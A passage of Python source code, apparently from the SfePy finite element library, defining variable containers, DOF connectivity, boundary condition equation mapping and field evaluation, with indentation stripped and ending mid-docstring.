if info.primary is not None:
var = info.primary
field = var.get_field()
field.setup_extra_data(info.ps_tg, info, info.is_trace)
region = info.get_region()
_assign(adof_conns, info, region, var, field, info.is_trace)
if info.has_virtual and not info.is_trace:
var = info.virtual
field = var.get_field()
field.setup_extra_data(info.v_tg, info, False)
aux = var.get_primary()
var = aux if aux is not None else var
region = info.get_region(can_trace=False)
_assign(adof_conns, info, region, var, field, False)
if verbose:
output('...done in %.2f s' % timer.stop())
return adof_conns
def create_adof_conn(eq, conn, dpn, offset):
"""
Given a node connectivity, number of DOFs per node and equation mapping,
create the active dof connectivity.
Locally (in a connectivity row), the DOFs are stored DOF-by-DOF (u_0 in all
local nodes, u_1 in all local nodes, ...).
Globally (in a state vector), the DOFs are stored node-by-node (u_0, u_1,
..., u_X in node 0, u_0, u_1, ..., u_X in node 1, ...).
"""
if dpn == 1:
aux = nm.take(eq, conn)
adc = aux + nm.asarray(offset * (aux >= 0), dtype=nm.int32)
else:
n_el, n_ep = conn.shape
adc = nm.empty((n_el, n_ep * dpn), dtype=conn.dtype)
ii = 0
for idof in range(dpn):
aux = nm.take(eq, dpn * conn + idof)
adc[:, ii : ii + n_ep] = aux + nm.asarray(offset * (aux >= 0),
dtype=nm.int32)
ii += n_ep
return adc
def expand_basis(basis, dpn):
"""
Expand basis for variables with several components (DOFs per node), in a
way compatible with :func:`create_adof_conn()`, according to `dpn`
(DOF-per-node count).
"""
n_c, n_bf = basis.shape[-2:]
ebasis = nm.zeros(basis.shape[:2] + (dpn, n_bf * dpn), dtype=nm.float64)
for ic in range(n_c):
for ir in range(dpn):
ebasis[..., n_c*ir+ic, ir*n_bf:(ir+1)*n_bf] = basis[..., ic, :]
return ebasis
class Variables(Container):
"""
Container holding instances of Variable.
"""
@staticmethod
def from_conf(conf, fields):
"""
This method resets the variable counters for automatic order!
"""
Variable.reset()
obj = Variables()
for key, val in six.iteritems(conf):
var = Variable.from_conf(key, val, fields)
obj[var.name] = var
obj.setup_dtype()
obj.setup_ordering()
return obj
def __init__(self, variables=None):
Container.__init__(self, OneTypeList(Variable),
state=set(),
virtual=set(),
parameter=set(),
has_virtual_dcs=False,
has_lcbc=False,
has_lcbc_rhs=False,
has_eq_map=False,
ordered_state=[],
ordered_virtual=[])
if variables is not None:
for var in variables:
self[var.name] = var
self.setup_ordering()
self.setup_dtype()
self.adof_conns = {}
def __setitem__(self, ii, var):
Container.__setitem__(self, ii, var)
if var.is_state():
self.state.add(var.name)
elif var.is_virtual():
self.virtual.add(var.name)
elif var.is_parameter():
self.parameter.add(var.name)
var._variables = self
self.setup_ordering()
self.setup_dof_info()
def setup_dtype(self):
"""
Setup data types of state variables - all have to be of the same
data type, one of nm.float64 or nm.complex128.
"""
dtypes = {nm.complex128 : 0, nm.float64 : 0}
for var in self.iter_state(ordered=False):
dtypes[var.dtype] += 1
if dtypes[nm.float64] and dtypes[nm.complex128]:
raise ValueError("All variables must have the same dtype!")
elif dtypes[nm.float64]:
self.dtype = nm.float64
elif dtypes[nm.complex128]:
self.dtype = nm.complex128
else:
self.dtype = None
def link_duals(self):
"""
Link state variables with corresponding virtual variables,
and assign link to self to each variable instance.
Usually, when solving a PDE in the weak form, each state
variable has a corresponding virtual variable.
"""
for ii in self.state:
self[ii].dual_var_name = None
for ii in self.virtual:
vvar = self[ii]
try:
self[vvar.primary_var_name].dual_var_name = vvar.name
except IndexError:
pass
def get_dual_names(self):
"""
Get names of pairs of dual variables.
Returns
-------
duals : dict
The dual names as virtual name : state name pairs.
"""
duals = {}
for name in self.virtual:
duals[name] = self[name].primary_var_name
return duals
def setup_ordering(self):
"""
Setup ordering of variables.
"""
self.link_duals()
orders = []
for var in self:
try:
orders.append(var._order)
except:
pass
orders.sort()
self.ordered_state = [None] * len(self.state)
for var in self.iter_state(ordered=False):
ii = orders.index(var._order)
self.ordered_state[ii] = var.name
self.ordered_virtual = [None] * len(self.virtual)
ii = 0
for var in self.iter_state(ordered=False):
if var.dual_var_name is not None:
self.ordered_virtual[ii] = var.dual_var_name
ii += 1
def has_virtuals(self):
return len(self.virtual) > 0
def setup_dof_info(self, make_virtual=False):
"""
Setup global DOF information.
"""
self.di = DofInfo('state_dof_info')
for var_name in self.ordered_state:
self.di.append_variable(self[var_name])
if make_virtual:
self.vdi = DofInfo('virtual_dof_info')
for var_name in self.ordered_virtual:
self.vdi.append_variable(self[var_name])
else:
self.vdi = self.di
def setup_lcbc_operators(self, lcbcs, ts=None, functions=None):
"""
Prepare linear combination BC operator matrix and right-hand side
vector.
"""
from sfepy.discrete.common.region import are_disjoint
if lcbcs is None:
self.lcdi = self.adi
return
self.lcbcs = lcbcs
if (ts is None) or ((ts is not None) and (ts.step == 0)):
regs = []
var_names = []
for bcs in self.lcbcs:
for bc in bcs.iter_single():
vns = bc.get_var_names()
regs.append(bc.regions[0])
var_names.append(vns[0])
if bc.regions[1] is not None:
regs.append(bc.regions[1])
var_names.append(vns[1])
for i0 in range(len(regs) - 1):
for i1 in range(i0 + 1, len(regs)):
if ((var_names[i0] == var_names[i1])
and not are_disjoint(regs[i0], regs[i1])):
raise ValueError('regions %s and %s are not disjoint!'
% (regs[i0].name, regs[i1].name))
ops = LCBCOperators('lcbcs', self, functions=functions)
for bcs in self.lcbcs:
for bc in bcs.iter_single():
vns = bc.get_var_names()
dofs = [self[vn].dofs for vn in vns if vn is not None]
bc.canonize_dof_names(*dofs)
if not is_active_bc(bc, ts=ts, functions=functions):
continue
output('lcbc:', bc.name)
ops.add_from_bc(bc, ts)
aux = ops.make_global_operator(self.adi)
self.mtx_lcbc, self.vec_lcbc, self.lcdi = aux
self.has_lcbc = self.mtx_lcbc is not None
self.has_lcbc_rhs = self.vec_lcbc is not None
def get_lcbc_operator(self):
if self.has_lcbc:
return self.mtx_lcbc
else:
raise ValueError('no LCBC defined!')
def equation_mapping(self, ebcs, epbcs, ts, functions, problem=None,
active_only=True):
"""
Create the mapping of active DOFs from/to all DOFs for all state
variables.
Parameters
----------
ebcs : Conditions instance
The essential (Dirichlet) boundary conditions.
epbcs : Conditions instance
The periodic boundary conditions.
ts : TimeStepper instance
The time stepper.
functions : Functions instance
The user functions for boundary conditions.
problem : Problem instance, optional
The problem that can be passed to user functions as a context.
active_only : bool
If True, the active DOF info ``self.adi`` uses the reduced (active
DOFs only) numbering. Otherwise it is the same as ``self.di``.
Returns
-------
active_bcs : set
The set of boundary conditions active in the current time.
"""
self.ebcs = ebcs
self.epbcs = epbcs
##
# Assing EBC, PBC to variables and regions.
if ebcs is not None:
self.bc_of_vars = self.ebcs.group_by_variables()
else:
self.bc_of_vars = {}
if epbcs is not None:
self.bc_of_vars = self.epbcs.group_by_variables(self.bc_of_vars)
##
# List EBC nodes/dofs for each variable.
active_bcs = set()
for var_name in self.di.var_names:
var = self[var_name]
bcs = self.bc_of_vars.get(var.name, None)
var_di = self.di.get_info(var_name)
active = var.equation_mapping(bcs, var_di, ts, functions,
problem=problem)
active_bcs.update(active)
if self.has_virtual_dcs:
vvar = self[var.dual_var_name]
vvar_di = self.vdi.get_info(var_name)
active = vvar.equation_mapping(bcs, vvar_di, ts, functions,
problem=problem)
active_bcs.update(active)
self.adi = DofInfo('active_state_dof_info')
for var_name in self.ordered_state:
self.adi.append_variable(self[var_name], active=active_only)
if self.has_virtual_dcs:
self.avdi = DofInfo('active_virtual_dof_info')
for var_name in self.ordered_virtual:
self.avdi.append_variable(self[var_name], active=active_only)
else:
self.avdi = self.adi
self.has_eq_map = True
return active_bcs
def get_matrix_shape(self):
if not self.has_eq_map:
raise ValueError('call equation_mapping() first!')
return (self.avdi.ptr[-1], self.adi.ptr[-1])
def setup_initial_conditions(self, ics, functions):
self.ics = ics
self.ic_of_vars = self.ics.group_by_variables()
for var_name in self.di.var_names:
var = self[var_name]
ics = self.ic_of_vars.get(var.name, None)
if ics is None: continue
var.setup_initial_conditions(ics, self.di, functions)
for var_name in self.parameter:
var = self[var_name]
if hasattr(var, 'special') and ('ic' in var.special):
setter, sargs, skwargs = var._get_setter('ic', functions)
var.set_data(setter(*sargs, **skwargs))
output('IC data of %s set by %s()' % (var.name, setter.name))
def set_adof_conns(self, adof_conns):
"""
Set all active DOF connectivities to `self` as well as relevant
sub-dicts to the individual variables.
"""
self.adof_conns = adof_conns
for var in self:
var.adof_conns = {}
for key, val in six.iteritems(adof_conns):
if key[0] in self.names:
var = self[key[0]]
var.adof_conns[key] = val
var = var.get_dual()
if var is not None:
var.adof_conns[key] = val
def create_state_vector(self):
vec = nm.zeros((self.di.ptr[-1],), dtype=self.dtype)
return vec
def create_stripped_state_vector(self):
vec = nm.zeros((self.adi.ptr[-1],), dtype=self.dtype)
return vec
def apply_ebc(self, vec, force_values=None):
"""
Apply essential (Dirichlet) and periodic boundary conditions
defined for the state variables to vector `vec`.
"""
for var in self.iter_state():
var.apply_ebc(vec, self.di.indx[var.name].start, force_values)
def apply_ic(self, vec, force_values=None):
"""
Apply initial conditions defined for the state variables to
vector `vec`.
"""
for var in self.iter_state():
var.apply_ic(vec, self.di.indx[var.name].start, force_values)
def strip_state_vector(self, vec, follow_epbc=False, svec=None):
"""
Get the reduced DOF vector, with EBC and PBC DOFs removed.
Notes
-----
If 'follow_epbc' is True, values of EPBC master dofs are not simply
thrown away, but added to the corresponding slave dofs, just like when
assembling. For vectors with state (unknown) variables it should be set
to False, for assembled vectors it should be set to True.
"""
if svec is None:
svec = nm.empty((self.adi.ptr[-1],), dtype=self.dtype)
for var in self.iter_state():
aindx = self.adi.indx[var.name]
svec[aindx] = var.get_reduced(vec, self.di.indx[var.name].start,
follow_epbc)
return svec
def make_full_vec(self, svec, force_value=None, vec=None):
"""
Make a full DOF vector satisfying E(P)BCs from a reduced DOF
vector.
Parameters
----------
svec : array
The reduced DOF vector.
force_value : float, optional
Passing a `force_value` overrides the EBC values.
vec : array, optional
If given, the buffer for storing the result (zeroed).
Returns
-------
vec : array
The full DOF vector.
"""
self.check_vector_size(svec, stripped=True)
if self.has_lcbc:
if self.has_lcbc_rhs:
svec = self.mtx_lcbc * svec + self.vec_lcbc
else:
svec = self.mtx_lcbc * svec
if vec is None:
vec = self.create_state_vector()
for var in self.iter_state():
indx = self.di.indx[var.name]
aindx = self.adi.indx[var.name]
var.get_full(svec, aindx.start, force_value, vec, indx.start)
return vec
def has_ebc(self, vec, force_values=None):
for var_name in self.di.var_names:
eq_map = self[var_name].eq_map
i0 = self.di.indx[var_name].start
ii = i0 + eq_map.eq_ebc
if force_values is None:
if not nm.allclose(vec[ii], eq_map.val_ebc):
return False
else:
if isinstance(force_values, dict):
if not nm.allclose(vec[ii], force_values[var_name]):
return False
else:
if not nm.allclose(vec[ii], force_values):
return False
# EPBC.
if not nm.allclose(vec[i0+eq_map.master], vec[i0+eq_map.slave]):
return False
return True
def get_indx(self, var_name, stripped=False, allow_dual=False):
var = self[var_name]
if not var.is_state():
if allow_dual and var.is_virtual():
var_name = var.primary_var_name
else:
msg = '%s is not a state part' % var_name
raise IndexError(msg)
if stripped:
return self.adi.indx[var_name]
else:
return self.di.indx[var_name]
def check_vector_size(self, vec, stripped=False):
"""
Check whether the shape of the DOF vector corresponds to the
total number of DOFs of the state variables.
Parameters
----------
vec : array
The vector of DOF values.
stripped : bool
If True, the size of the DOF vector should be reduced,
i.e. without DOFs fixed by boundary conditions.
"""
if not stripped:
n_dof = self.di.get_n_dof_total()
if vec.size != n_dof:
msg = 'incompatible data size!' \
' (%d (variables) == %d (DOF vector))' \
% (n_dof, vec.size)
raise ValueError(msg)
else:
if self.has_lcbc:
n_dof = self.lcdi.get_n_dof_total()
else:
n_dof = self.adi.get_n_dof_total()
if vec.size != n_dof:
msg = 'incompatible data size!' \
' (%d (active variables) == %d (reduced DOF vector))' \
% (n_dof, vec.size)
raise ValueError(msg)
def get_state_part_view(self, state, var_name, stripped=False):
self.check_vector_size(state, stripped=stripped)
return state[self.get_indx(var_name, stripped)]
def set_state_part(self, state, part, var_name, stripped=False):
self.check_vector_size(state, stripped=stripped)
state[self.get_indx(var_name, stripped)] = part
def get_state_parts(self, vec=None):
"""
Return parts of a state vector corresponding to individual state
variables.
Parameters
----------
vec : array, optional
The state vector. If not given, then the data stored in the
variables are returned instead.
Returns
-------
out : dict
The dictionary of the state parts.
"""
if vec is not None:
self.check_vector_size(vec)
out = {}
for var in self.iter_state():
if vec is None:
out[var.name] = var()
else:
out[var.name] = vec[self.di.indx[var.name]]
return out
def set_data(self, data, step=0, ignore_unknown=False,
preserve_caches=False):
"""
Set data (vectors of DOF values) of variables.
Parameters
----------
data : array
The state vector or dictionary of {variable_name : data vector}.
step : int, optional
The time history step, 0 (default) = current.
ignore_unknown : bool, optional
Ignore unknown variable names if `data` is a dict.
preserve_caches : bool
If True, do not invalidate evaluate caches of variables.
"""
if data is None: return
if isinstance(data, dict):
for key, val in six.iteritems(data):
try:
var = self[key]
except (ValueError, IndexError):
if ignore_unknown:
pass
else:
raise KeyError('unknown variable! (%s)' % key)
else:
var.set_data(val, step=step,
preserve_caches=preserve_caches)
elif isinstance(data, nm.ndarray):
self.check_vector_size(data)
for ii in self.state:
var = self[ii]
var.set_data(data, self.di.indx[var.name], step=step,
preserve_caches=preserve_caches)
else:
raise ValueError('unknown data class! (%s)' % data.__class__)
def set_from_state(self, var_names, state, var_names_state):
"""
Set variables with names in `var_names` from state variables with names
in `var_names_state` using DOF values in the state vector `state`.
"""
self.check_vector_size(state)
if isinstance(var_names, basestr):
var_names = [var_names]
var_names_state = [var_names_state]
for ii, var_name in enumerate(var_names):
var_name_state = var_names_state[ii]
if self[var_name_state].is_state():
self[var_name].set_data(state, self.di.indx[var_name_state])
else:
msg = '%s is not a state part' % var_name_state
raise IndexError(msg)
def state_to_output(self, vec, fill_value=None, var_info=None,
extend=True, linearization=None):
"""
Convert a state vector to a dictionary of output data usable by
Mesh.write().
"""
di = self.di
if var_info is None:
self.check_vector_size(vec)
var_info = {}
for name in di.var_names:
var_info[name] = (False, name)
out = {}
for key, indx in six.iteritems(di.indx):
var = self[key]
if key not in list(var_info.keys()): continue
is_part, name = var_info[key]
if is_part:
aux = vec
else:
aux = vec[indx]
out.update(var.create_output(aux, key=name, extend=extend,
fill_value=fill_value,
linearization=linearization))
return out
def iter_state(self, ordered=True):
if ordered:
for ii in self.ordered_state:
yield self[ii]
else:
for ii in self.state:
yield self[ii]
def init_history(self):
for var in self.iter_state():
var.init_history()
def time_update(self, ts, functions, verbose=True):
if verbose:
output('updating variables...')
for var in self:
var.time_update(ts, functions)
if verbose:
output('...done')
def advance(self, ts):
for var in self.iter_state():
var.advance(ts)
class Variable(Struct):
_count = 0
_orders = []
_all_var_names = set()
@staticmethod
def reset():
Variable._count = 0
Variable._orders = []
Variable._all_var_names = set()
@staticmethod
def from_conf(key, conf, fields):
aux = conf.kind.split()
if len(aux) == 2:
kind, family = aux
elif len(aux) == 3:
kind, family = aux[0], '_'.join(aux[1:])
else:
raise ValueError('variable kind is 2 or 3 words! (%s)' % conf.kind)
history = conf.get('history', None)
if history is not None:
try:
history = int(history)
assert_(history >= 0)
except (ValueError, TypeError):
raise ValueError('history must be integer >= 0! (got "%s")'
% history)
order = conf.get('order', None)
if order is not None:
order = int(order)
primary_var_name = conf.get('dual', None)
if primary_var_name is None:
if hasattr(conf, 'like'):
primary_var_name = get_default(conf.like, '(set-to-None)')
else:
primary_var_name = None
special = conf.get('special', None)
if family == 'field':
try:
fld = fields[conf.field]
except IndexError:
msg = 'field "%s" does not exist!' % conf.field
raise KeyError(msg)
if "DG" in fld.family_name:
obj = DGFieldVariable(conf.name, kind, fld, order, primary_var_name,
special=special, key=key, history=history)
else:
obj = FieldVariable(conf.name, kind, fld, order, primary_var_name,
special=special, key=key, history=history)
else:
raise ValueError('unknown variable family! (%s)' % family)
return obj
def __init__(self, name, kind, order=None, primary_var_name=None,
special=None, flags=None, **kwargs):
Struct.__init__(self, name=name, **kwargs)
self.flags = set()
if flags is not None:
for flag in flags:
self.flags.add(flag)
self.indx = slice(None)
self.n_dof = None
self.step = 0
self.dt = 1.0
self.initial_condition = None
self.dual_var_name = None
self.eq_map = None
if self.is_virtual():
self.data = None
else:
self.data = deque()
self.data.append(None)
self._set_kind(kind, order, primary_var_name, special=special)
Variable._all_var_names.add(name)
def _set_kind(self, kind, order, primary_var_name, special=None):
if kind == 'unknown':
self.flags.add(is_state)
if order is not None:
if order in Variable._orders:
raise ValueError('order %d already used!' % order)
else:
self._order = order
Variable._orders.append(order)
else:
self._order = Variable._count
Variable._orders.append(self._order)
Variable._count += 1
self.dof_name = self.name
elif kind == 'test':
if primary_var_name == self.name:
raise ValueError('primary variable for %s cannot be %s!'
% (self.name, primary_var_name))
self.flags.add(is_virtual)
msg = 'test variable %s: related unknown missing' % self.name
self.primary_var_name = get_default(primary_var_name, None, msg)
self.dof_name = self.primary_var_name
elif kind == 'parameter':
self.flags.add(is_parameter)
msg = 'parameter variable %s: related unknown missing' % self.name
self.primary_var_name = get_default(primary_var_name, None, msg)
if self.primary_var_name == '(set-to-None)':
self.primary_var_name = None
self.dof_name = self.name
else:
self.dof_name = self.primary_var_name
if special is not None:
self.special = special
else:
raise NotImplementedError('unknown variable kind: %s' % kind)
self.kind = kind
def _setup_dofs(self, n_nod, n_components, val_shape):
"""
Setup number of DOFs and DOF names.
"""
self.n_nod = n_nod
self.n_components = n_components
self.val_shape = val_shape
self.n_dof = self.n_nod * self.n_components
self.dofs = [self.dof_name + ('.%d' % ii)
for ii in range(self.n_components)]
def get_primary(self):
"""
Get the corresponding primary variable.
Returns
-------
var : Variable instance
The primary variable, or `self` for state
variables or if `primary_var_name` is None, or None if no other
variables are defined.
"""
if self.is_state():
var = self
elif self.primary_var_name is not None:
if ((self._variables is not None)
and (self.primary_var_name in self._variables.names)):
var = self._variables[self.primary_var_name]
else:
var = None
else:
var = self
return var
def get_dual(self):
"""
Get the dual variable.
Returns
-------
var : Variable instance
The primary variable for non-state variables, or the dual
variable for state variables.
"""
if self.is_state():
if ((self._variables is not None)
and (self.dual_var_name in self._variables.names)):
var = self._variables[self.dual_var_name]
else:
var = None
else:
if ((self._variables is not None)
and (self.primary_var_name in self._variables.names)):
var = self._variables[self.primary_var_name]
else:
var = None
return var
def is_state(self):
return is_state in self.flags
def is_virtual(self):
return is_virtual in self.flags
def is_parameter(self):
return is_parameter in self.flags
def is_state_or_parameter(self):
return (is_state in self.flags) or (is_parameter in self.flags)
def is_kind(self, kind):
return eval('self.is_%s()' % kind)
def is_real(self):
return self.dtype in real_types
def is_complex(self):
return self.dtype in complex_types
def is_finite(self, step=0, derivative=None, dt=None):
return nm.isfinite(self(step=step, derivative=derivative, dt=dt)).all()
def get_primary_name(self):
if self.is_state():
name = self.name
else:
name = self.primary_var_name
return name
def init_history(self):
"""Initialize data of variables with history."""
if self.history is None: return
self.data = deque((self.history + 1) * [None])
self.step = 0
def time_update(self, ts, functions):
"""Implemented in subclasses."""
pass
def advance(self, ts):
"""
Advance in time the DOF state history. A copy of the DOF vector
is made to prevent history modification.
"""
if self.history is None: return
self.step = ts.step + 1
if self.history > 0:
# Copy the current step data to the history data, shift history,
# initialize if needed. The current step data are left intact.
# Note: cannot use self.data.rotate() due to data sharing with
# State.
for ii in range(self.history, 0, -1):
if self.data[ii] is None:
self.data[ii] = nm.empty_like(self.data[0])
self.data[ii][:] = self.data[ii - 1]
# Advance evaluate cache.
for step_cache in six.itervalues(self.evaluate_cache):
steps = sorted(step_cache.keys())
for step in steps:
if step is None:
# Special caches with possible custom advance()
# function.
for key, val in six.iteritems(step_cache[step]):
if hasattr(val, '__advance__'):
val.__advance__(ts, val)
elif -step < self.history:
step_cache[step-1] = step_cache[step]
if len(steps) and (steps[0] is not None):
step_cache.pop(steps[-1])
def init_data(self, step=0):
"""
Initialize the dof vector data of time step `step` to zeros.
"""
if self.is_state_or_parameter():
data = nm.zeros((self.n_dof,), dtype=self.dtype)
self.set_data(data, step=step)
def set_constant(self, val):
"""
Set the variable to a constant value.
"""
data = nm.empty((self.n_dof,), dtype=self.dtype)
data.fill(val)
self.set_data(data)
def set_data(self, data=None, indx=None, step=0,
preserve_caches=False):
"""
Set data (vector of DOF values) of the variable.
Parameters
----------
data : array
The vector of DOF values.
indx : int, optional
If given, `data[indx]` is used.
step : int, optional
The time history step, 0 (default) = current.
preserve_caches : bool
If True, do not invalidate evaluate caches of the variable.
"""
data = data.ravel()
if indx is None:
indx = slice(0, len(data))
else:
indx = slice(int(indx.start), int(indx.stop))
n_data_dof = indx.stop - indx.start
if self.n_dof != n_data_dof:
msg = 'incompatible data shape! (%d (variable) == %d (data))' \
% (self.n_dof, n_data_dof)
raise ValueError(msg)
elif (step > 0) or (-step >= len(self.data)):
raise ValueError('step %d out of range! ([%d, 0])'
% (step, -(len(self.data) - 1)))
else:
self.data[step] = data
self.indx = indx
if not preserve_caches:
self.invalidate_evaluate_cache(step=step)
def __call__(self, step=0, derivative=None, dt=None):
"""
Return vector of degrees of freedom of the variable.
Parameters
----------
step : int, default 0
The time step (0 means current, -1 previous, ...).
derivative : None or 'dt'
If not None, return time derivative of the DOF vector,
approximated by the backward finite difference.
Returns
-------
vec : array
The DOF vector. If `derivative` is None: a view of the data vector,
otherwise: required derivative of the DOF vector
at time step given by `step`.
Notes
-----
If the previous time step is requested in step 0, the step 0
DOF vector is returned instead.
"""
if derivative is None:
if (self.step == 0) and (step == -1):
data = self.data[0]
else:
data = self.data[-step]
if data is None:
raise ValueError('data of variable are not set! (%s, step %d)' \
% (self.name, step))
return data[self.indx]
else:
if self.history is None:
msg = 'set history type of variable %s to use derivatives!'\
% self.name
raise ValueError(msg)
dt = get_default(dt, self.dt)
return (self(step=step) - self(step=step-1)) / dt
def get_initial_condition(self):
if self.initial_condition is None:
return 0.0
else:
return self.initial_condition
class FieldVariable(Variable):
"""
A finite element field variable.
field .. field description of variable (borrowed)
"""
def __init__(self, name, kind, field, order=None, primary_var_name=None,
special=None, flags=None, history=None, **kwargs):
Variable.__init__(self, name, kind, order, primary_var_name,
special, flags, history=history, **kwargs)
self._set_field(field)
self.has_field = True
self.has_bc = True
self._variables = None
self.clear_evaluate_cache()
def _set_field(self, field):
"""
Set field of the variable.
Takes reference to a Field instance. Sets dtype according to
field.dtype. Sets `dim` attribute to spatial dimension.
"""
self.is_surface = field.is_surface
self.field = field
self._setup_dofs(field.n_nod, field.n_components, field.val_shape)
self.flags.add(is_field)
self.dtype = field.dtype
self.dim = field.domain.shape.dim
def _get_setter(self, kind, functions, **kwargs):
"""
Get the setter function of the variable and its arguments depending in
the setter kind.
"""
if not (hasattr(self, 'special') and (kind in self.special)):
return
setter_name = self.special[kind]
setter = functions[setter_name]
region = self.field.region
nod_list = self.field.get_dofs_in_region(region)
nods = nm.unique(nod_list)
coors = self.field.get_coor(nods)
if kind == 'setter':
sargs = (kwargs.get('ts'), coors)
elif kind == 'ic':
sargs = (coors, )
skwargs = {'region' : region}
return setter, sargs, skwargs
def get_field(self):
return self.field
def get_mapping(self, region, integral, integration,
get_saved=False, return_key=False):
"""
Get the reference element mapping of the underlying field.
See Also
--------
sfepy.discrete.common.fields.Field.get_mapping
"""
if region is None:
region = self.field.region
out = self.field.get_mapping(region, integral, integration,
get_saved=get_saved,
return_key=return_key)
return out
def get_dof_conn(self, dc_type, is_trace=False, trace_region=None):
"""
Get active dof connectivity of a variable.
Notes
-----
The primary and dual variables must have the same Region.
"""
if self.is_virtual():
var = self.get_primary()
# No primary variable can occur in single term evaluations.
var_name = var.name if var is not None else self.name
else:
var_name = self.name
if not is_trace:
region_name = dc_type.region_name
else:
aux = self.field.domain.regions[dc_type.region_name]
region = aux.get_mirror_region(trace_region)
region_name = region.name
key = (var_name, region_name, dc_type.type, is_trace)
dc = self.adof_conns[key]
return dc
def get_dof_info(self, active=False):
details = Struct(name='field_var_dof_details',
n_nod=self.n_nod,
dpn=self.n_components)
if active:
n_dof = self.n_adof
else:
n_dof = self.n_dof
return n_dof, details
def time_update(self, ts, functions):
"""
Store time step, set variable data for variables with the setter
function.
"""
if ts is not None:
self.dt = ts.dt
if hasattr(self, 'special') and ('setter' in self.special):
setter, sargs, skwargs = self._get_setter('setter', functions,
ts=ts)
self.set_data(setter(*sargs, **skwargs))
output('data of %s set by %s()' % (self.name, setter.name))
def set_from_qp(self, data_qp, integral, step=0):
"""
Set DOFs of variable using values in quadrature points
corresponding to the given integral.
"""
data_vertex = self.field.average_qp_to_vertices(data_qp, integral)
# Field nodes values.
data = self.field.interp_v_vals_to_n_vals(data_vertex)
data = data.ravel()
self.indx = slice(0, len(data))
self.data[step] = data
def set_from_mesh_vertices(self, data):
"""
Set the variable using values at the mesh vertices.
"""
ndata = self.field.interp_v_vals_to_n_vals(data)
self.set_data(ndata)
def set_from_function(self, fun, step=0):
"""
Set the variable data (the vector of DOF values) using a function of
space coordinates.
Parameters
----------
fun : callable
The function of coordinates returning DOF values of shape
`(n_coor, n_components)`.
step : int, optional
The time history step, 0 (default) = current.
"""
_, vv = self.field.set_dofs(fun, self.field.region, self.n_components)
self.set_data(vv.ravel(), step=step)
def equation_mapping(self, bcs, var_di, ts, functions, problem=None,
warn=False):
"""
Create the mapping of active DOFs from/to all DOFs.
Sets n_adof.
Returns
-------
active_bcs : set
The set of boundary conditions active in the current time.
"""
self.eq_map = EquationMap('eq_map', self.dofs, var_di)
if bcs is not None:
bcs.canonize_dof_names(self.dofs)
bcs.sort()
active_bcs = self.eq_map.map_equations(bcs, self.field, ts, functions,
problem=problem, warn=warn)
self.n_adof = self.eq_map.n_eq
return active_bcs
def setup_initial_conditions(self, ics, di, functions, warn=False):
"""
Setup of initial conditions.
"""
ics.canonize_dof_names(self.dofs)
ics.sort()
self.initial_condition = nm.zeros((di.n_dof[self.name],),
dtype=self.dtype)
for ic in ics:
region = ic.region
dofs, val = ic.dofs
if warn:
clean_msg = ('warning: ignoring nonexistent' \
' IC node (%s) in ' % self.name)
else:
clean_msg = None
nod_list = self.field.get_dofs_in_region(region)
if len(nod_list) == 0:
continue
fun = get_condition_value(val, functions, 'IC', ic.name)
if isinstance(fun, Function):
aux = fun
fun = lambda coors: aux(coors, ic=ic)
nods, vv = self.field.set_dofs(fun, region, len(dofs), clean_msg)
eq = expand_nodes_to_equations(nods, dofs, self.dofs)
self.initial_condition[eq] = nm.ravel(vv)
def get_data_shape(self, integral, integration='volume', region_name=None):
"""
Get element data dimensions for given approximation.
Parameters
----------
integral : Integral instance
The integral describing used numerical quadrature.
integration : 'volume', 'surface', 'surface_extra', 'point' or 'custom'
The term integration type.
region_name : str
The name of the region of the integral.
Returns
-------
data_shape : 5 ints
The `(n_el, n_qp, dim, n_en, n_comp)` for volume shape kind,
`(n_fa, n_qp, dim, n_fn, n_comp)` for surface shape kind and
`(n_nod, 0, 0, 1, n_comp)` for point shape kind.
Notes
-----
- `n_el`, `n_fa` = number of elements/facets
- `n_qp` = number of quadrature points per element/facet
- `dim` = spatial dimension
- `n_en`, `n_fn` = number of element/facet nodes
- `n_comp` = number of variable components in a point/node
- `n_nod` = number of element nodes
"""
aux = self.field.get_data_shape(integral, integration=integration,
region_name=region_name)
data_shape = aux + (self.n_components,)
return data_shape
def clear_evaluate_cache(self):
"""
Clear current evaluate cache.
"""
self.evaluate_cache = {}
def invalidate_evaluate_cache(self, step=0):
"""
Invalidate variable data in evaluate cache for time step given
by `step` (0 is current, -1 previous, ...).
This should be done, for example, prior to every nonlinear
solver iteration.
"""
for step_cache in six.itervalues(self.evaluate_cache):
for key in list(step_cache.keys()):
if key == step: # Given time step to clear.
step_cache.pop(key)
def evaluate(self, mode='val',
region=None, integral=None, integration=None,
step=0, time_derivative=None, is_trace=False,
trace_region=None, dt=None, bf=None):
"""
Evaluate various quantities related to the variable according to
`mode` in quadrature points defined by `integral`.
The evaluated data are cached in the variable instance in
`evaluate_cache` attribute.
Parameters
----------
mode : one of 'val', 'grad', 'div', 'cauchy_strain'
The evaluation mode.
region : Region instance, optional
The region where the evaluation occurs. If None, the
underlying field region is used.
integral : Integral instance, optional
The integral defining quadrature points in which the
evaluation occurs. If None, the first order volume integral
is created. Must not be None for surface integrations.
integration : 'volume', 'surface', 'surface_extra', or 'point'
The term integration type. If None, it is derived from
`integral`.
step : int, default 0
The time step (0 means current, -1 previous, ...).
time_derivative : None or 'dt'
If not None, return time derivative of the data,
approximated by the backward finite difference.
is_trace : bool, default False
Indicate evaluation of trace of the variable on a boundary
region.
dt : float, optional
The time step to be used if `derivative` is `'dt'`. If None,
the `dt` attribute of the variable is used.
bf : Base function, optional
The base function to be used in 'val' mode.
Returns
-------
out : array
The 4-dimensional array of shape
`(n_el, n_qp, n_row, n_col)` with the requested data,
where `n_row`, `n_col` depend on `mode`.
"""
if integration == 'custom':
msg = 'cannot use FieldVariable.evaluate() with custom integration!'
raise ValueError(msg)
step_cache = self.evaluate_cache.setdefault(mode, {})
cache = step_cache.setdefault(step, {})
field = self.field
if region is None:
region = field.region
if is_trace:
region = region.get_mirror_region(trace_region)
if (region is not field.region) and not region.is_empty:
assert_(field.region.contains(region))
if integral is None:
integral = Integral('aux_1', 1)
if integration is None:
integration = 'volume' if region.can_cells else 'surface'
geo, _, key = field.get_mapping(region, integral, integration,
return_key=True)
key += (time_derivative, is_trace)
if key in cache:
out = cache[key]
else:
vec = self(step=step, derivative=time_derivative, dt=dt)
ct = integration
if integration == 'surface_extra':
ct = 'volume'
conn = field.get_econn(ct, region, is_trace, integration)
shape = self.get_data_shape(integral, integration, region.name)
if self.dtype == nm.float64:
out = eval_real(vec, conn, geo, mode, shape, bf)
else:
out = eval_complex(vec, conn, geo, mode, shape, bf)
cache[key] = out
return out
def get_state_in_region(self, region, reshape=True, step=0):
"""
